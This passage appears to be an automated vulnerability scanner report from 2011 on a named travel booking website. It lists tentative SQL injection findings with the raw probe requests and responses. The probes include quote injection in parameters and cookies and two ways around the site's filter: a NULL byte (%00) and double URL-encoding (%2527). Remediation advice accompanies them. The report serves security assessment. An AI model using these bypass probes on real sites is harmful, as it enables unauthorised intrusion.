User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD%2527%2527; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:17:52 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:17:52 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:17:52 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:17:52 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 120654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Chicago, IL
...[SNIP]...

1.18. http://www.reservetravel.com/v6 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64&1%00'=1 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:18:19 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64&1%00''=1 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:18:20 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:18:20 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:18:20 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:18:20 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 120654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Chicago, IL
...[SNIP]...

1.19. http://www.reservetravel.com/v6 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /v6?siteid=64&&1'=1 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=16&c2=107
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:14:04 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-Cnection: close
Content-Length: 107

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?siteid=64&&1''=1 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=16&c2=107
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:14:05 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:14:5 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:14:5 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:14:5 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 47174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>ReserveTrav
...[SNIP]...

1.20. http://www.reservetravel.com/v6 [server cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The server cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the server cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the server cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015%2527; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:17:45 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015%2527%2527; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:17:46 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: server=v63015; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:17:46 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:17:46 GMT; path=/v6
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:17:46 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 120654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Chicago, IL
...[SNIP]...

1.21. http://www.reservetravel.com/v6 [siteId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The siteId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the siteId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the siteId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64%2527; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:17:48 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64%2527%2527; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:17:49 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:17:49 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:17:49 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:17:49 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 120654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Chicago, IL
...[SNIP]...

1.22. http://www.reservetravel.com/v6 [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The siteid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the siteid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the siteid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /v6?siteid=64%2527& HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=16&c2=107
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:14:02 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?siteid=64%2527%2527& HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=16&c2=107
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:14:03 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:14:3 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:14:3 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:14:3 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 47174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>ReserveTrav
...[SNIP]...

1.23. http://www.reservetravel.com/v6 [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The siteid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the siteid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64%00' HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:17:42 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64%00'' HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:17:43 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:17:43 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:17:43 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:17:43 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 120654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Chicago, IL
...[SNIP]...

1.24. http://www.reservetravel.com/v6 [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The type parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the type parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /v6?type=hotellist%00'&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:17:18 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?type=hotellist%00''&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:17:19 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:17:19 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:17:19 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:17:19 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 47174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>ReserveTrav
...[SNIP]...

2. Cross-site scripting (reflected)  previous
There are 210 instances of this issue:

Issue background

